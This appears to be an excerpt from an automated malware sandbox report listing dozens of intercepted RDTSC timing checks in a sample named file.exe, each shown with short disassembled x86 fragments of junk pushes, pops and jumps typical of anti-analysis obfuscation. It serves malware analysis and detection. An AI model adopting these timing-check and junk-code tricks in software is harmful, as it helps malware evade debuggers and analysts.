                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5444BF second address: 5444FA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB438CB0C08h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d push esi 0x0000000e pop esi 0x0000000f jmp 00007FB438CB0C08h 0x00000014 popad 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5444FA second address: 5444FF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 546263 second address: 546267 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5454E4 second address: 545509 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB438C6F736h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e jo 00007FB438C6F726h 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 545509 second address: 545529 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB438CB0C09h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54835B second address: 54837C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 ja 00007FB438C6F726h 0x0000000c jc 00007FB438C6F726h 0x00000012 popad 0x00000013 pop esi 0x00000014 push edi 0x00000015 jne 00007FB438C6F728h 0x0000001b push eax 0x0000001c push edx 0x0000001d push edi 0x0000001e pop edi 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 549B24 second address: 549B28 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 549B28 second address: 549B3D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 jbe 00007FB438C6F734h 0x0000000d push eax 0x0000000e push edx 0x0000000f jc 00007FB438C6F726h 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 549B3D second address: 549BFB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 nop 0x00000007 push 00000000h 0x00000009 push eax 0x0000000a call 00007FB438CB0BF8h 0x0000000f pop eax 0x00000010 mov dword ptr [esp+04h], eax 0x00000014 add dword ptr [esp+04h], 0000001Bh 0x0000001c inc eax 0x0000001d push eax 0x0000001e ret 0x0000001f pop eax 0x00000020 ret 0x00000021 mov ebx, dword ptr [ebp+1247BA58h] 0x00000027 sub di, 0490h 0x0000002c push 00000000h 0x0000002e push 00000000h 0x00000030 push ebp 0x00000031 call 00007FB438CB0BF8h 0x00000036 pop ebp 0x00000037 mov dword ptr [esp+04h], ebp 0x0000003b add dword ptr [esp+04h], 00000017h 0x00000043 inc ebp 0x00000044 push ebp 0x00000045 ret 0x00000046 pop ebp 0x00000047 ret 0x00000048 jg 00007FB438CB0C08h 0x0000004e jne 00007FB438CB0BFEh 0x00000054 push 00000000h 0x00000056 push 00000000h 0x00000058 push ecx 0x00000059 call 00007FB438CB0BF8h 0x0000005e pop ecx 0x0000005f mov dword ptr [esp+04h], ecx 0x00000063 add dword ptr [esp+04h], 0000001Bh 0x0000006b inc ecx 0x0000006c push ecx 0x0000006d ret 0x0000006e pop ecx 0x0000006f ret 0x00000070 push eax 0x00000071 push eax 0x00000072 push edx 0x00000073 jns 00007FB438CB0C0Ah 0x00000079 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 549BFB second address: 549C17 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB438C6F738h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 548C3D second address: 548C43 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 548C43 second address: 548C47 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54AD68 second address: 54AD6E instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54CADF second address: 54CAF1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 jnp 00007FB438C6F734h 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54CAF1 second address: 54CAF5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54CAF5 second address: 54CB32 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 nop 0x00000007 sub edi, dword ptr [ebp+122D2C19h] 0x0000000d pushad 0x0000000e mov ch, 14h 0x00000010 mov edi, dword ptr [ebp+122D2BD5h] 0x00000016 popad 0x00000017 push 00000000h 0x00000019 mov di, ax 0x0000001c push 00000000h 0x0000001e mov di, 1BD5h 0x00000022 push eax 0x00000023 push eax 0x00000024 push edx 0x00000025 push eax 0x00000026 jmp 00007FB438C6F736h 0x0000002b pop eax 0x0000002c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54CC91 second address: 54CC99 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54DC27 second address: 54DC2C instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54EC25 second address: 54ECA9 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FB438CB0C0Ah 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b mov bx, B3BCh 0x0000000f push dword ptr fs:[00000000h] 0x00000016 mov ebx, edi 0x00000018 mov dword ptr fs:[00000000h], esp 0x0000001f mov dword ptr [ebp+124550FEh], ecx 0x00000025 mov eax, dword ptr [ebp+122D02EDh] 0x0000002b mov edi, 79B99A00h 0x00000030 push FFFFFFFFh 0x00000032 jmp 00007FB438CB0BFAh 0x00000037 nop 0x00000038 jg 00007FB438CB0C08h 0x0000003e push eax 0x0000003f jo 00007FB438CB0C14h 0x00000045 push eax 0x00000046 push edx 0x00000047 jmp 00007FB438CB0C02h 0x0000004c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54ECA9 second address: 54ECAD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 550AF6 second address: 550AFA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F238A second address: 4F23BE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB438C6F734h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edx 0x0000000a pushad 0x0000000b jns 00007FB438C6F726h 0x00000011 push esi 0x00000012 pop esi 0x00000013 jmp 00007FB438C6F730h 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 555077 second address: 555089 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FB438CB0BF6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jng 00007FB438CB0BFEh 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 555089 second address: 55508F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5554AE second address: 5554EE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jbe 00007FB438CB0BF6h 0x0000000b jmp 00007FB438CB0C09h 0x00000010 jmp 00007FB438CB0C04h 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5554EE second address: 5554FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jng 00007FB438C6F726h 0x0000000c popad 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F8CEE second address: 4F8D28 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB438CB0BFBh 0x00000007 push ebx 0x00000008 jnp 00007FB438CB0BF6h 0x0000000e jng 00007FB438CB0BF6h 0x00000014 pop ebx 0x00000015 pop edx 0x00000016 pop eax 0x00000017 pushad 0x00000018 pushad 0x00000019 jmp 00007FB438CB0BFBh 0x0000001e jnl 00007FB438CB0BF6h 0x00000024 pushad 0x00000025 popad 0x00000026 popad 0x00000027 push ecx 0x00000028 pushad 0x00000029 popad 0x0000002a pop ecx 0x0000002b pushad 0x0000002c push eax 0x0000002d push edx 0x0000002e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F8D28 second address: 4F8D2E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F8D2E second address: 4F8D34 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F8D34 second address: 4F8D41 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F8D41 second address: 4F8D45 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55E698 second address: 55E6AA instructions: 0x00000000 rdtsc 0x00000002 jg 00007FB438C6F726h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jo 00007FB438C6F726h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55E6AA second address: 55E6AE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55E6AE second address: 55E6C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jl 00007FB438C6F728h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55E6C0 second address: 55E707 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB438CB0BFAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esp+04h] 0x0000000d jmp 00007FB438CB0C08h 0x00000012 mov eax, dword ptr [eax] 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007FB438CB0C09h 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55E707 second address: 55E71E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB438C6F733h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 563D30 second address: 563D35 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 562ABB second address: 562AC0 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5631CF second address: 5631DC instructions: 0x00000000 rdtsc 0x00000002 jc 00007FB438CB0BF6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 563348 second address: 563361 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007FB438C6F733h 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 563B4F second address: 563B53 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 563B53 second address: 563B5C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 563B5C second address: 563B61 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FC282 second address: 4FC288 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56A534 second address: 56A54A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB438CB0C00h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56A54A second address: 56A553 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56A553 second address: 56A557 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5326E0 second address: 5326F4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FB438C6F72Fh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 532848 second address: 532861 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB438CB0C05h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 532861 second address: 532866 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5328EE second address: 53292A instructions: 0x00000000 rdtsc 0x00000002 je 00007FB438CB0BF8h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp], esi 0x0000000f push 00000000h 0x00000011 push esi 0x00000012 call 00007FB438CB0BF8h 0x00000017 pop esi 0x00000018 mov dword ptr [esp+04h], esi 0x0000001c add dword ptr [esp+04h], 00000016h 0x00000024 inc esi 0x00000025 push esi 0x00000026 ret 0x00000027 pop esi 0x00000028 ret 0x00000029 nop 0x0000002a push eax 0x0000002b push edx 0x0000002c jg 00007FB438CB0BFCh 0x00000032 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5329FD second address: 532A02 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 532A02 second address: 532A3C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov eax, dword ptr [eax] 0x00000009 pushad 0x0000000a jmp 00007FB438CB0C04h 0x0000000f jno 00007FB438CB0BFCh 0x00000015 popad 0x00000016 mov dword ptr [esp+04h], eax 0x0000001a jc 00007FB438CB0C00h 0x00000020 pushad 0x00000021 push eax 0x00000022 pop eax 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 532C7B second address: 532C80 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53309A second address: 5330A0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51A64B second address: 51A654 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 push edx 0x00000008 pop edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51A654 second address: 51A65E instructions: 0x00000000 rdtsc 0x00000002 jng 00007FB438CB0BF6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E66E8 second address: 4E66F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push esi 0x00000007 pop esi 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E66F0 second address: 4E66F4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56A835 second address: 56A83B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56AB20 second address: 56AB7D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB438CB0C07h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jnl 00007FB438CB0BF6h 0x00000010 jmp 00007FB438CB0C09h 0x00000015 jmp 00007FB438CB0C00h 0x0000001a jmp 00007FB438CB0C01h 0x0000001f popad 0x00000020 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56AB7D second address: 56AB83 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56AB83 second address: 56AB8D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007FB438CB0BF6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56AB8D second address: 56AB9D instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FB438C6F726h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56B162 second address: 56B171 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jl 00007FB438CB0BF6h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56B171 second address: 56B175 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56B175 second address: 56B18C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB438CB0BFBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jc 00007FB438CB0BFCh 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 572BA2 second address: 572BAD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 572BAD second address: 572BB1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 572BB1 second address: 572BB7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 572EAD second address: 572EB4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 572EB4 second address: 572F01 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB438C6F739h 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FB438C6F739h 0x00000013 js 00007FB438C6F732h 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5730A6 second address: 5730AA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 573239 second address: 57324D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB438C6F730h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 57324D second address: 573259 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jbe 00007FB438CB0BF6h 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 573259 second address: 573285 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jg 00007FB438C6F72Ah 0x00000012 jp 00007FB438C6F736h 0x00000018 jmp 00007FB438C6F730h 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 573390 second address: 5733C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jp 00007FB438CB0C0Bh 0x0000000b jmp 00007FB438CB0BFEh 0x00000010 pushad 0x00000011 ja 00007FB438CB0BF6h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 57352E second address: 57353E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop ecx 0x00000007 pop ebx 0x00000008 push eax 0x00000009 push edx 0x0000000a push ecx 0x0000000b pushad 0x0000000c popad 0x0000000d pushad 0x0000000e popad 0x0000000f pop ecx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 57353E second address: 573555 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FB438CB0C00h 0x00000008 push edi 0x00000009 pop edi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5737F2 second address: 57380C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jl 00007FB438C6F726h 0x0000000c jmp 00007FB438C6F72Eh 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 57380C second address: 573812 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 573812 second address: 573818 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 573D97 second address: 573D9B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 573D9B second address: 573DA5 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FB438C6F726h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5799AA second address: 5799B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5799B0 second address: 5799B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 57A222 second address: 57A228 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 57A228 second address: 57A22E instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 57A22E second address: 57A24C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jne 00007FB438CB0BF6h 0x00000009 jmp 00007FB438CB0C03h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 57A24C second address: 57A258 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push esi 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 57A258 second address: 57A25E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 57A25E second address: 57A262 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 57A262 second address: 57A266 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
